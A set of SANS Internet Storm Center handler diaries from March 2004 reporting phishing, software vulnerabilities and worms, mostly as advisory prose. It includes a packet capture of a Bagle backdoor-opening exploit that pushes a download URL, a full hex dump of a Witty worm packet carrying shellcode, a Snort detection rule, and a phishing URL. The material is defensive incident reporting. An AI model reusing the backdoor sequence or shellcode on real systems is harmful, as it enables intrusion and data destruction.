Diaries

Published: 2004-03-31

New Phishing Technique / Vulnerability Data Base Resource

New Phishing Technique
A new phishing attack technique was discovered today in a Citibank scam targeting Citibank customers.
In this technique "the Address bar on the browser is spoofed, using Javascript and frames, the real address bar is suppressed and despite the HTTPS callout in the Address bar, there is no SSL padlock present in the lower corner of the browser."
References: http://www.antiphishing.org/phishing_archive/Citibank_3-31-04.htm
Open Source Vulnerability Data Base
The Open Source Vulnerability Data Base Project made an announcement today about the public availability usage of the Open Source Vulnerability Data Base.
This base intends to be " an open project to collect and distribute vulnerability information freely to everyone" .
" The OSVDB collects vulnerability data on every type of computer software and
operating system. Like other open-source projects, the OSVDB depends on the
wide expertise of its contributors to provide dependable information on many
technologies and security problems. The project's open-source license makes
the results freely available to users worldwide."
The project can be found at http://www.osvdb.org
Pretty calm day today...

Tomorrow is April 1st. Be careful about what you read...
-------------------------------

Pedro Bueno (bueno_AT_ieee.org)

0 Comments

Published: 2004-03-30

Vulnerability in tcpdump, Increase in UDP/1027 activity, Save Your Ship article

Vulnerability in TCPDUMP versions 3.8.1 and earlier

---------------------------------------------------

An advisory was issued on the BUGTRAQ mailing list indicating a buffer overflow in the popular tcpdump sniffer tool. When processing malformed ISAKMP traffic in verbose display mode, tcpdump is vulnerable to a denial of service attack. This vulnerability is believed to be limited to a denial of service attack at this time. The two vulnerabilities associated with this flaw have been assigned CVE numbers CAN-2004-0183 and CAN-2004-0184. It is recommended that users upgrade their version of tcpdump to the 3.8.3 version to resolve this flaw.


http://www.rapid7.com/advisories/R7-0017.html



Increase in UDP/1027 activity

-----------------------------

UDP/1027 is commonly associated with the Windows messenging service, often used to send "Windows Popup" SPAM messages to unsuspecting victims. We've seen a recent increase in traffic sent to this port, with content ranging from adult website advertisements, to prescription medication sales to deceptive marketing campaigns. Some popup messages even claim to be from Microsoft, offering links to web pages that appear to be a legitimate Microsoft website.


Note that the source addresses for this traffic are always suspect, since they do not require any kind of a response to be effective. An attacker can use any source address they desire to send the UDP traffic to a wide range of targets.


Organizations with stateful firewalls should consider dropping UDP traffic with a destination port of 1026 or 1027 to curtail this kind of activity. If you are seeing these type of popup messages sent to your computer, you should consider investing in a personal firewall product.




Save Your Ship Article

----------------------

Network Magazine has published an article written by the Storm Center Incident Handler Greg Shipley on the process and policy end of patching. The article includes a timeline correlating exploit announcements to worm activity for various Windows, Solaris and Linux worms over the years. The article is informative, insightful and available at:


http://i.cmpnet.com/nc/1506/graphics/1506f1_file.pdf



The illustration for the vulnerability/worm timeline is also available at:
http://i.cmpnet.com/nc/1506/graphics/1506f1a.gif




--Joshua Wright/Handler on Duty

0 Comments

Published: 2004-03-29

Beagle Exploit, SSL NULL encryption (update), port 12345 and 1026


Beagle Virus Exploit

====================


Versions of the 'Beagle' (aka Bagle) virus open a back door on port 2745
(TCP). We do monitor increased scanning activity
for this port. Today, a reader submitted a tool which is
used to scan for Beagle infected systems. If the tool finds
port 2745 open, it will send the 'magic string' to open the
backdoor. Next, a URL is send to the system. The Bagle infected system
will attempt to download the content of the URL and execute it.

Sample session (using a netcat listener):

1. Establish TCP connection to port 2745

18:29:09.159691 10.1.0.129.1043 > 10.1.0.13.2745: S
2963418754:2963418754(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 0084 4000 8006 e5b4 0a01 0081 E..0..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e82 0000 0000 ................
0x0020 7002 4000 409f 0000 0204 05b4 0101 0402 p.@.@...........
18:29:09.159784 10.1.0.13.2745 > 10.1.0.129.1043: S
3650381978:3650381978(0) ack 2963418755 win 5840 <mss
1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 0000 4000 4006 2639 0a01 000d E..0..@.@.&9....
0x0010 0a01 0081 0ab9 0413 d994 689a b0a2 2e83 ..........h.....
0x0020 7012 16d0 278f 0000 0204 05b4 0101 0402 p...'...........
18:29:09.160207 10.1.0.129.1043 > 10.1.0.13.2745: . ack 1 win 17520 (DF)
0x0000 4500 0028 0085 4000 8006 e5bb 0a01 0081 E..(..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5010 4470 26b3 0000 0204 05b4 0101 P.Dp&.........

2. Send "exploit buffer"

18:29:09.161325 10.1.0.129.1043 > 10.1.0.13.2745: P 1:18(17) ack 1 win
17520 (DF)
0x0000 4500 0039 0086 4000 8006 e5a9 0a01 0081 E..9..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5018 4470 ef7f 0000 43ff ffff 3030 3001 P.Dp....C...000.
0x0030 0a1f 2b28 2ba1 3201 00 ..+(+.2..
18:29:09.161413 10.1.0.13.2745 > 10.1.0.129.1043: . ack 18 win 5840 (DF)
0x0000 4500 0028 8cbe 4000 4006 9982 0a01 000d E..(..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5010 16d0 5442 0000 0000 0000 0000 P...TB........

3. 'reply' from infected host (just 'CR' in this case)


18:29:18.391801 10.1.0.13.2745 > 10.1.0.129.1043: P 1:2(1) ack 18 win
5840 (DF)
0x0000 4500 0029 8cbf 4000 4006 9980 0a01 000d E..)..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5018 16d0 4a39 0000 0a00 0000 0000 P...J9........

4. send URL for download

18:29:18.393460 10.1.0.129.1043 > 10.1.0.13.2745: P 18:23(5) ack 2 win
17519 (DF)
0x0000 4500 002d 0087 4000 8006 e5b4 0a01 0081 E..-..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e94 d994 689c ..............h.
0x0020 5018 446f 1ab8 0000 2768 7474 7046 P.Do....'http

Mailbag: Port 12345 scans

=========================


a user submitted logs showing large numbers of scans against
port 12345 (TCP). This port is commonly associated with the trojan
'Netbus' and other malware. The log did not indicate a new tool
but rather appears to be a number of sequential connect scans.

Ports in focus: 1026

====================


scans for port 1026 appear to increase again over the last
couple weeks. According to some reports, this is due to popup
spam, which now relies more on compromised systems as origin.

http://isc.sans.org/port_details.html?port=1026

In the past, only a small number of sources originated this
traffic.

SSL "NULL" Encryption (Errata)

==============================


An earlier diary ( http://isc.sans.org/diary.html?date=04-03-04 )
quoted Dr. Neal Krawetz, from Secure Science Corporation as saying
that "One of the SSL encoding methods is "plain text". Most SSL servers
have this disabled by default, but most browsers support it. When plain
text is used, no central certificate authority is consulted and the user
never sees a message asking if a certificate should be accepted (because
"plain text" doesn't use certificates). Keeping that in mind, the little
lock icon may not even indicate an encrypted channel. The little lock
only indicates an SSL connection"

Prompted by reader feedback, we did our own experiments, limiting an
Apache 1.3 server to 'NULL' encryption. We were not able to reproduce
this issue with any recent browser.

Mozilla, in default configuration, will popup an error dialog stating
that no common cipher could be found. If the 'null'/'plain text'
encryption is specifically enabled, the page will load, but the
certificate will still be validated and any errors will be communicated
to the user

Microsoft Internet Explorer will show a generic error page. It does
not appear to be possible in MSIE 6 to enable 'NULL' encryption.

---------------------------------------------

Johannes Ullrich, jullrich_AT_sans.org


0 Comments

Published: 2004-03-28

Activity increase on Port 12345; More Phishing; Ethereal Exploit

Activity Increase on Port 12345

There is an increase in traffic for the targets and records for port
12345.



http://isc.incidents.org/port_details.html?port=12345



The source numbers are staying constant. If anyone has any captures of
this traffic please let us know.

More Phishing

We received an active Phishing scam to retrieve a user's ID and password
from WestPac Online Banking.
This attempt takes you to an actual Westpac site where you get a 404 Not
Found error and then a pop up
on top that asks for your information. The popup is located at:



http://deretlens.info/west/westpac.php.



The site is still active at this time. More information can also be
found at:



http://www.antiphishing.org/phishing_archive/westpac_03-26-04.htm




Ethereal Exploit Code

The exploit code against the latest Ethereal vulnerabilities has been
published. It is important to ensure that you have
upgraded to 0.10.3. For more information see:



http://isc.incidents.org/diary.html?date=2004-03-23

http://www.ethereal.com/appnotes/enpa-sa-00013.html




--------------------------------------------------

Handler on Duty: Lorna J. Hutcheson

0 Comments

Published: 2004-03-27

Exploit for Cisco Vulnerabilities Released

Exploit for Cisco Vulnerabilities Released

Exploit for Cisco vulnerabilities has been released. It targets several Cisco previous vulnerabilities in various Cisco products. Following Cisco advisories on upgrading/workarounds should protect your systems from such threats.

For more information, please refer to Cisco Security Notice:

http://www.cisco.com/warp/public/707/cisco-sn-20040326-exploits.shtml

0 Comments

Published: 2004-03-26

ISS Default Misconfiguration, New Bagel.U, and a couple 'witty' notes

ISS Default Misconfiguration Problem

Today ISS notified its customers of a problem discovered in the default configuration of some versions of their RealSecure and BlackICE products. "This misconfiguration changes the default blocking and reporting behavior and may affect your level of protection. While the most current releases block most of the major threats (including Blaster, Nachi, Slammer, and Witty), ISS strongly recommends that customers update to this new release to provide maximum coverage for all threats."

http://www.iss.net/support/

New Bagel Variant: Bagel.U

New Bagel o' the Day: Bagel.U. This is the 21st variant classified. Noteworthy: unlike previous versions that used "tricky subject lines or enticing messages" this one arrives as an attachment to an otherwise empty message.

http://www.computerworld.com/securitytopics/security/virus/story/0,10801,91678,00.html
http://www.sarc.com/avcenter/venc/data/w32.beagle.u@mm.html

Witty Notes

A couple of article links that discuss security products being targeted, and the weakness of patch-based security.

http://www.computerworld.com/securitytopics/security/holes/story/0,10801,91688p2,00.html
http://news.com.com/2100-7355_3-5180482.html?tag=nefd_top
-------------------------------------------------------------------

Handler on duty: Dave Brookshire

0 Comments

Published: 2004-03-25

DoS from 127.0.0.1; Server compromise at gnome.org; Netsky.P still spreading

DoS from 127.0.0.1

We have received log files of a reported DoS attack with a source
address of 127.0.0.1 (loopback). The packets were TCP resets (RST) with
a source port of 80 and destination port between 1000-2000. No data was
contained in the packets.

After analysis, these packets appear to be fall-out from the Blaster
worm. If service providers or network administrators changed the
windowsupdate.com address to resolve to 127.0.0.1, a host infected with
Blaster will attempt to perform a DoS against itself (127.0.0.1). The
problem with this approach is that the worm spoofs the source address
before sending the packet. When the infected machine's TCP/IP stack
receives the packet (TCP 80 SYN request), it attempts to respond to the
spoofed source IP address with TCP RST. The spoofed IP addresses are a
random number based on the machine's CLASS B address.

If you have identified such behavior on your network, you can attempt
to trace the infected machine by MAC address. And send us some logs of
the activity so we can compare your incident to the others we have
received.

More information on the Blaster worm can be found at your favorite
anti-virus site.

------------------------------------------------------------------------

Server compromise at gnome.org

The GNOME project suspects a compromise on several servers. GNOME is an
open-source project that provides UNIX and Linux desktop similar to the
KDE desktop environment. It appears that no source code or distribution
files were modified.

Source:
http://mail.gnome.org/archives/gnome-announce-list/2004-March/msg00113.html

"We've discovered evidence of an intrusion on the server hosting
www.gnome.org and other gnome.org websites. At the present time, we
think that the released gnome sources and the gnome source code
repository are unaffected.

We are investigating further and will provide updates as we know more.
We hope to have the essential services hosted on the affected machine
up and running again as soon as possible.

The GNOME sysadmin team
23 March 2003"

A follow-up e-mail was posted to the GNOME mailing list that shows they
are making fast progress in restoring the services on these machines:
http://mail.gnome.org/archives/gnome-announce-list/2004-March/msg00113.html

------------------------------------------------------------------------

Netsky.P still spreading

The Netsky.P virus/worm is still spreading according to antivirus sites
and we continue to see it in our mailboxes. One of the possible e-mail
messages it sends contains a FROM: address of well-known anti-virus
companies and the following message:

The sample file you sent contains a new virus version of mydoom.j.
Please clean your system with the attached signature.
Sincerly,
Robert Ferrew

It may also append the following text, substituting any popular anti-
virus company name:
+++ Attachment: No Virus found +++ MC-Afee AntiVirus - www.mcafee.com

[EOF]

0 Comments

Published: 2004-03-24

Netsky.P Triggered, MSVC++ Constructed ISAPI Applications DoS

Netsky.P Triggered

-------------------------------------------------------------------



One of the lastest Netsky variants, Netsky.P, triggered and began mass mailing infected messages on March 24th between 1500 and 1800 GMT (assuming that the infected machine's clock is set correctly). Message Labs is reporting that it had intercepted over 200,000 messages as of midnight GMT.



More info:



http://www.messagelabs.com/viruseye/info/netskyp.asp





MSVC++ Constructed ISAPI Applications DoS

-------------------------------------------------------------------



Secunia is reporting that all applications constructed with Microsoft Visual C++ and MFC (Microsoft Foundation Classes) that use ISAPI (Internet Server Application Programming Interface) extensions may be vulnerable to DoS attacks.



The issue affects both Microsoft Visual C++ 6.0 and Microsoft Visual Studio 6.0 prior to Service Pack 6. Under heavy loads, applications compiled with the ISAPI extensions may produce invalid results when processing POST data, possibly resulting in access violations.



Recompiling applications after installing Service Pack 6 will fix the problem.



More info:



http://secunia.com/advisories/11199/





-------------------------------------------------------------------

Handler on duty: Tom Liston - < http://www.labreatechnologies.com >

0 Comments

Published: 2004-03-23

Ethereal Vulnerabilities / NetSky.P

No news in the witty front...Back to Infocon 'GREEN'.

For information about the Witty worm check previous diaries:

http://isc.sans.org/diary.html?date=2004-03-20

http://isc.sans.org/diary.html?date=2004-03-22
Multiple Vulnerabilities in Ethereal
Ethereal released an advisory today about multiple vulnerabilities in
version 0.10.2. According the advisory, by exploring this
vulnerability, it is possible to make Ethereal to crash or execute
arbitrary code "by injecting a purposefully malformed packet onto the
wire, by convincing someone to read a malformed packet trace file, or
by creating a malformed color filter file."
The solution is to upgrade to version 0.10.3.
At the time that this diary is written, the is no version 0.10.3
available to download in ethereal website.
References: http://www.ethereal.com/appnotes/enpa-sa-00013.html
New Netsky Variant
Symantec moved the new Netsky variant to level 3. The netsky.p variant also
uses a vulnerability in IE to execute E-mail attachments. This is a known flaw and has a patch available since 2001.
Reference: http://www.eweek.com/article2/0,1759,1552315,00.asp
------------------------------------------------

Handler on Duty: Pedro Bueno (bueno_AT_ieee.org)

0 Comments

Published: 2004-03-22

Witty Worm Wrap-up

Witty Worm Wrap-up

For our more technical discussion about the Witty worm, see Saturdays diary:

http://isc.sans.org/diary.html?date=2004-03-20
We expect to return to infocon 'GREEN' later today.

Witty Worm Traffic

Infected machines generated outbound UDP traffic at line speed, frequently saturating local area networks. As a result, the traffic generated was high compared to the number of infected hosts. At this time, we have reports for about 20,000 unique IP addresses sending UDP packets from port 4000 over the weekend. The traffic rose very fast, and dropped within the first hour. This is likely a result of the Witty worm's destructive component, which will crash infected systems and prevent them from rebooting.

Graphs

Witty traffic (packets reported): http://isc.sans.org/images/witty1.jpg

Unique IPs per hour: http://isc.sans.org/images/witty2.jpg

Geographic Animation: http://isc.sans.org/witty.html
(this diary will be updated throughout the day)

--------------

Johannes Ullrich, jullrich_AT_sans.org

0 Comments

Published: 2004-03-20

ALERT - Black Ice Worm

(Note: we will not start new diaries this weekend. Instead, we will keep amending this diary)
"Witty" worm attacks BlackICE firewall
Summary

=======

At around 12:00 AM EST (05:00 UTC) on Saturday, we detected an upsurge
in UDP traffic from source port 4000. This traffic is caused by a new
worm ("Witty") which exploits a vulnerability in BlackIce's ICQ parser.

Given that this worm generates large amounts of traffic, and the wide
spread use of BlackIce, we will keep the InfoCon level at 'YELLOW',
likely until Monday morning.
While "witty" packets with other source ports are seen, they will not
trigger the vulnerability. Likely, these packets are due to infected
hosts behind NAT devices.
Detection

=========

Infected hosts will send large amounts of UDP traffic, typically
saturating a local network connection. The BlackIce task bar icon will
no longer allow the user to shut down BlackIce. It will display a
message reading "Operation could not be completed. Access is denied".


Eventually, the system will crash. Infected systems are reported to
show corrupted hard disks.


The worm will not write itself to disk. As a result, Virus scanners
may not detect it.


Snort rule by ISC Handler Pedro Bueno:


alert udp any 4000:5000 -> any any (msg:"Witty Initial Traffic";
content:"|29202020202020696e73657274207769747479206d6573736167652068657265|";rev:1;)

(note: you may want to remove the source port restriction)
Snort.org has posted additional rules to "detect the worms and should any other exploits based off of the same vulnerability."
Removal

=======

A reboot will remove the worm from the system. However, the worm
causes random hard disk corruption and the system may no longer
function. The ISS XForce has directions that _may_ help recovering some less severely Corrupted systems. These directions are available at http://xforce.iss.net/xforce/alerts/id/167 .
Prevention

==========

Disconnect systems running BlackIce as soon as possible!



Block all UDP packets with a source port of 4000
Blocking UDP packets with a source port of 4000 may disrupt
some network services. We do no know of any major services
(other then old versions of ICQ) that require UDP 4000)


This worm will corrupt hard disks and leave systems
unusable.


These versions of BlackIce and RealSecure have been identified
as vulnerable:
BlackICE™ Agent for Server 3.6 ebz, ecd, ece, ecf

BlackICE PC Protection 3.6 cbz, ccd, ccf

BlackICE Server Protection 3.6 cbz, ccd, ccf

RealSecure® Network 7.0, XPU 22.4 and 22.10

RealSecure Server Sensor 7.0 XPU 22.4 and 22.10

RealSecure Desktop 7.0 ebf, ebj, ebk, ebl

RealSecure Desktop 3.6 ebz, ecd, ece, ecf

RealSecure Guard 3.6 ebz, ecd, ece, ecf

RealSecure Sentry 3.6 ebz, ecd, ece, ecf

Other ISS products may be vulnerable as well. Please refer to ISS
for details (see end of this post for links).
Links

=====
* Internet Security Systems Information
ISS Witty Worm Announcement: http://www.iss.net/support/wittyworm.php

ISS XForce Security Alert: http://xforce.iss.net/xforce/alerts/id/167

ISS XForce Security Alert: http://xforce.iss.net/xforce/alerts/id/166

ISS Software Updates (Enterprise): http://www.iss.net/download/

BlackIce Updates (Consumer): http://blackice.iss.net/update_center/index.php
* Third Party Information
Matt Murphy's Analysis: http://www.netsecure.shawbiz.ca/witty-analysis.html

Lurhq Analysis: http://www.lurhq.com/witty.html

eEye Security Advisory: http://www.eeye.com/html/Research/Advisories/AD20040318.html

F-Secure Analysis: http://www.f-secure.com/v-descs/witty.shtml

Symantec Analysis: http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.worm.html

Snort Rules: http://www.snort.org

SecurityFocus Vulnerabilty Information: http://www.securityfocus.com/bid/9913

Secunia Advisory: http://secunia.com/advisories/11073/

USCert Security Update: http://www.uscert.gov/current/current_activity.html#witty

USCert Vulnerability Update: http://www.kb.cert.org/vuls/id/947254
Sample Packet

=============



01:54:45.699383 219.154.156.161.4000 > 65.173.218.164.50212: udp 997
0x0000 4500 0401 d3b4 0000 7111 dda9 db9a 9ca1 E.......q.......
0x0010 41ad daa4 0fa0 c424 03ed dd38 0500 0000 A......$...8....
0x0020 0000 0012 0200 0000 0000 0000 0000 0000 ................
0x0030 0002 2c00 0500 0000 0000 006e 0000 0000 ..,........n....
0x0040 0000 0000 0000 0000 0000 0000 0001 0000 ................
0x0050 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0060 4102 0500 0000 0000 00de 0300 0000 0000 A...............
0x0070 0000 0000 0000 0000 0000 0100 0001 0000 ................
0x0080 0100 001e 0220 2020 2020 2020 285e 2e5e ............(^.^
0x0090 2920 2020 2020 2069 6e73 6572 7420 7769 )......insert.wi
0x00a0 7474 7920 6d65 7373 6167 6520 6865 7265 tty.message.here
0x00b0 2e20 2020 2020 2028 5e2e 5e29 2020 2020 .......(^.^)....
0x00c0 2020 2089 e78b 7f14 83c7 0881 c4e8 fdff ................
0x00d0 ff31 c966 b933 3251 6877 7332 5f54 3eff .1.f.32Qhws2_T>.
0x00e0 159c 400d 5e89 c331 c966 b965 7451 6873 ..@.^..1.f.etQhs
0x00f0 6f63 6b54 533e ff15 9840 0d5e 6a11 6a02 ockTS>...@.^j.j.
0x0100 6a02 ffd0 89c6 31c9 5168 6269 6e64 5453 j.....1.QhbindTS
0x0110 3eff 1598 400d 5e31 c951 5151 81e9 feff >...@.^1.QQQ....
0x0120 f05f 5189 e16a 1051 56ff d031 c966 b974 ._Q..j.QV..1.f.t
0x0130 6f51 6873 656e 6454 533e ff15 9840 0d5e oQhsendTS>...@.^
0x0140 89c3 83c4 3c31 c951 6865 6c33 3268 6b65 ....<1.Qhel32hke
0x0150 726e 543e ff15 9c40 0d5e 31c9 5168 6f75 rnT>...@.^1.Qhou
0x0160 6e74 6869 636b 4368 4765 7454 5450 3eff nthickChGetTTP>.
0x0170 1598 400d 5eff d089 c583 c41c 31c9 81e9 ..@.^.......1...
0x0180 e0b1 ffff 5131 c02d 03bc fcff f7e5 2d3d ....Q1.-......-=
0x0190 61d9 ff89 c131 c02d 03bc fcff f7e1 2d3d a....1.-......-=
0x01a0 61d9 ff89 c531 d252 52c1 e910 6689 c850 a....1.RR...f..P
0x01b0 31c0 2d03 bcfc fff7 e52d 3d61 d9ff 89c5 1.-......-=a....
0x01c0 30e4 b002 5089 e06a 1050 31c0 502d 03bc 0...P..j.P1.P-..
0x01d0 fcff f7e5 2d3d 61d9 ff89 c5c1 e817 80c4 ....-=a.........
0x01e0 0350 5756 ffd3 83c4 1059 e298 31c0 2d03 .PWV.....Y..1.-.
0x01f0 bcfc fff7 e52d 3d61 d9ff 89c5 c1e8 1080 .....-=a........
0x0200 e407 80cc 30b0 4550 6844 5249 5668 4943 ....0.EPhDRIVhIC
0x0210 414c 6850 4859 5368 5c5c 2e5c 89e0 31c9 ALhPHYSh\\.\..1.
0x0220 51b2 20c1 e218 526a 0351 6a03 d1e2 5250 Q.....Rj.Qj...RP
0x0230 3eff 15dc 400d 5e83 c414 31c9 81e9 e0b1 >...@.^...1.....
0x0240 ffff 3dff ffff ff0f 8437 ffff ff56 89c6 ..=......7...V..
0x0250 31c0 5050 2d03 bcfc fff7 e52d 3d61 d9ff 1.PP-......-=a..
0x0260 89c5 d1e8 6689 c850 563e ff15 c440 0d5e ....f..PV>...@.^
0x0270 31c9 5189 e251 52b5 80d1 e151 b15e c1e1 1.Q..QR....Q.^..
0x0280 1851 563e ff15 9440 0d5e 563e ff15 3840 .QV>...@.^V>..8@
0x0290 0d5e 5e5e e9ac feff ff63 7607 5ee9 21fe .^^^.....cv.^.!.
0x02a0 ffff 0043 666a 7663 6c62 3431 5051 3530 ...Cfjvclb41PQ50
0x02b0 6a48 3150 6334 5051 5559 4878 3774 654f jH1Pc4PQUYHx7teO
0x02c0 7a54 5354 5954 654c 4d41 0d0a 446c 4433 zTSTYTeLMA..DlD3
0x02d0 5237 6c56 7442 4375 6b6b 6864 7a2b 3276 R7lVtBCukkhdz+2v
0x02e0 6f75 3033 4163 3557 4f52 6b75 7172 6764 ou03Ac5WORkuqrgd
0x02f0 4b72 7531 5a49 4f43 6c53 522f 7851 4f69 Kru1ZIOClSR/xQOi
0x0300 4b6f 3648 7a4a 7567 5272 4934 7337 4f6b Ko6HzJugRrI4s7Ok
0x0310 534b 7750 714c 7534 0d0a 3562 614e 6252 SKwPqLu4..5baNbR
0x0320 3067 504e 5950 4000 3406 b662 4044 5219 0gPNYP@.4..b@DR.
0x0330 928e 0442 6741 6241 4630 4544 4141 5741 ...BgAbAF0EDAAWA
0x0340 4141 4141 4141 4141 4131 3833 223e 0a20 AAAAAAAAA183">..
0x0350 2020 2020 8001 0000 4600 0000 4600 0000 ........F...F...
0x0360 8000 0000 0200 0000 66cc 5b40 ef1c 0d00 ........f.[@....
0x0370 83e1 00b0 1100 0600 d003 0000 d003 0000 ................
0x0380 0004 0000 0200 0000 aacc 5b40 0e27 0700 ..........[@.'..
0x0390 83e1 0000 0000 0002 00b0 d02b a49b 0800 ...........+....
0x03a0 4500 03c2 0a72 0000 8011 0000 83e1 1bb1 E....r..........
0x03b0 ba54 02a2 0fa0 06a5 03ae eb72 0500 0000 .T.........r....
0x03c0 0000 0012 0200 0000 0000 0000 0000 0000 ................
0x03d0 0002 2c00 0500 0000 0000 006e 0000 0000 ..,........n....
0x03e0 0000 0000 0000 0032 5e80 1d33 1d20 0c95 .......2^..3....
0x03f0 8310 167b 1100 0700 4600 0000 4600 0000 ...{....F...F...
0x0400 80 .


-----------------------------------------------------------------------

Johannes Ullrich, jullrich_AT_sans.org - SANS Institute.
Scott Fendley, scottf _AT_ uark.edu - University of Arkansas-Fayetteville

0 Comments

Published: 2004-03-19

XP SP2 Preview, Apache Update,Don't click on that attachment


Microsoft Releases a Preview of Service Pack 2 for Windows XP


To aid IT professionals in planning and testing for the deployment of Windows XP SP2. Microsoft is making available a preview, based on Release Candidate 1 of the SP2.



WARNING! This technical preview is unsupported and is intended for testing purposes only. Do not use in production environments.



http://www.microsoft.com/sp2preview/


Apache HTTP Server 2.0.49 Released



According to the release information, this release is a bug fix release to fix bugs that were found in version 2.0.48 three which were security vulnerabilities.


** When using multiple listening sockets, a denial of service attack is possible on some platforms due to a race condition in the handling of short-lived connections.


** Arbitrary client-supplied strings can be written to the error log
which can allow exploits of certain terminal emulators.


** A remotely triggered memory leak in mod_ssl can allow a denial
of service attack due to excessive memory consumption.


The new release is available for download at:
http://httpd.apache.org/download.cgi


A overview of the release can be found at:
http://httpd.apache.org/docs-2.0/new_features_2_0.html




Don't Click that Attachment


No matter how many times we say it, no matter how often it is repeated, we obviously can't say it enough. DON'T CLICK ON THE ATTACHMENT!


Today a small business that I am involved with called me in a panic. Something was wrong with their network. After much probbing and proding, I finally got it out of them. Someone had clicked on an attachment that they had received in an email.

It appears that one of the gals had gotten an email from the "administrator" that indicated that her "email account was being disabled due to misuse". Of course it was from the administrator so it must be legitimate (even though she had NEVER gotten an email from the administrator before). I immediately knew what had happened but was a little confused by how it had happened. They had an anti-virus program installed and it was set up to auto-update every week.


Hop in the car and go to their office to check it out. Upon arrival I discovered the problem, they had installed an update to a software program that they use. The update required them to disable their antivirus program for installation of the update. You guessed it, they disabled the AV on all of the computers to install the client side of the update and forgot to re-enable it. Consequently they had NO protection at all.


While taking care of things at this location, I received a call from their location about 20 miles away. Yep, you guessed it, they had received an email from administrator, and they had disabled the AV for the program update. Finishing the cleanup at the first location I headed to the second location to clean that one up too.


I think this company learned two valuable lessons today!


1. Don't click on attachments in emails regardless of who they come from!

2. Don't disable your anti-virus software. If you do have to in order to do a program update, make sure you turn it back on.


Maybe someday all software companies will figure out how to install their software updates without disabling the AV software. Until then, we have to protect ourselves!




Deb Hale



0 Comments

Published: 2004-03-18

Phatbot and stealthy polymorphic Alphabot Soup, ISS Product ICQ parsing vuln.

ISS Security Brief: Vulnerability in ICQ Parsing in ISS Products


ISS Alert:
http://xforce.iss.net/xforce/alerts/id/166

ISS Updates:
http://www.iss.net/download/

Phatbot and stealthy polymorphic Alphabot Soup

"Phatbot" is essentially an "alias" label used by some AV vendors for a Trojan and it's also a name assigned to a particular Trojan analyzed by the LURHQ Threat Intelligence Group. These Trojans - Phatbot, Polybot, Agobot Gaobot, SDBot, RandBot .... which have similar functionality and purpose, are "lumped together" by some AV Vendors into families of Trojans. Most of these Trojans can trace their roots to powerful warez Trojans that have plagued University network environments for a number of years (groundbreaking threat analysis was done Dave Dittrich at the University of Washington and others). In addition all of the "Agobot"'s should be thrown in as relatives, after all what's in a name. The variants released in later 2003 and 2004 include true Internet worm
functionality enabled by Microsoft vulnerabilities associated with Ports 135, 445, and 80.

PolyBots, Phatbots, polymorphism and stealth

McAfee describes a "Polybot" virus family. Their perception of the family structure is that "There are several other very closely related IRC bot families based on widely circulated Sdbot sources - IRC-Sdbot, W32/Sdbot.worm, W32/Randbot.worm, W32/Gaobot.worm." I'll get to one variant's "stealth" in a minute.
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=101090

Joe Stewart and the LURHQ team's analysis indicates to me that Phatbot is related to this Trojan family under discussion here. LURHQ goes on to describes Phatbot as having the "ability to polymorph on install in an
attempt to evade antivirus signatures as it spreads from system to system." (URL to their excellent analysis is below). The polymorph is interesting in that Phatbot morphs "on install". McAfee's analysis of Polybot shows a different pattern of morphing, McAfee says "The polymorphism in W32/Polybot worms is achieved by adding an "envelope" over a compiled HLL program of the worm. The envelope code reencrypts the whole file every time it runs." Morphing at "install" is one thing, morphing every time it runs is notably different.

Bot File Submissions Requested by Vendors - In addition to the polymorphing information, a recent email submission to the ISC by a Handlers Diary reader detailed how an AV Vendor recently emailed customers and stated their concern that a Polybot variant would not be detected by customers because of the Trojan's "stealthing" techniques. One vendors description of the stealthing (MacAfee) describes W32/Polybot.l!irc as "Stealthy and hides itself in memory. The file is deleted." The AV Vendor who wrote their customers specifically asks for submissions by customers of suspicious files, submissions needed to develop defenses against this stealthy Trojan.

All in all, this family of bots seems close to marrying stealth with a polymorphism implementation that'll morph it right out of the range of iterations AV engines can detect soon after it hits a host.

If you find any variants of this large family of Trojans please submit the files you find to your favorite Trojan Hunting application developer and AV vendor. Every submission "click" helps.

Rebuild versus cleaning with "tools".

If any "sensitive" system "you think you own" is actually owned by one of this family of bots, standard recommendations are to rebuild the infected systems from scratch.

For other information, check mailing lists for the many discussions going on concerning the number of systems "owned" by the botboyz.

Phatbot Trojan Analysis by LURHQ Threat Intelligence Group, material used with permission.

http://www.lurhq.com/phatbot.html
Release Date March 15, 2004

http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=101100
ALIASES Phatbot, W32.HLLW.Gaobot.gen (Symantec), Win32.Agobot (CA), WORM_AGOBOT.HM (Trend)

http://www.f-secure.com/v-descs/agobot_fo.shtml
NAME: Agobot.FO, ALIAS: Backdoor.Agobot.fo, W32.HLLW.Gaobot, Gaobot, Win32/Gaobot
ALIAS: Phatbot, Phat

Symantec's generic Gaobot family description is here;
http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.gaobot.rf.html

Patrick Nolan

0 Comments

Published: 2004-03-17

Updated (13:45 3/18 GMT): OpenSSL DoS Vulnerability, New Bagel Variants

OpenSSL DoS Vulnerability

------------------------------------------------------



The OpenSSL Project announced today that there is a null pointer assignment flaw in all versions of OpenSSL from 0.9.6c to 0.9.6l inclusive and from 0.9.7a to 0.9.7c inclusive. A specifically crafted SSL/TLS handshake could cause OpenSSL to crash. This could lead to a DoS against whatever application uses OpenSSL.



Because many devices/servers/systems use OpenSSL, this is a potential issue for many sites. Because of the nature of the vulnerability, there is not a means of using this for an exploit beyond a DoS, but it is important to be aware of this issue and patch affected installations as quickly as possible.



The OpenSSL Project announcement:



http://www.openssl.org/news/secadv_20040317.txt



Various vendor announcements (updated as they are available):

http://www.cisco.com/warp/public/707/cisco-sa-20040317-openssl.shtml

https://rhn.redhat.com/errata/RHSA-2004-121.html
http://www.openbsd.net/errata.html#openssl




------------------------------------------------------

New Bagel Variants

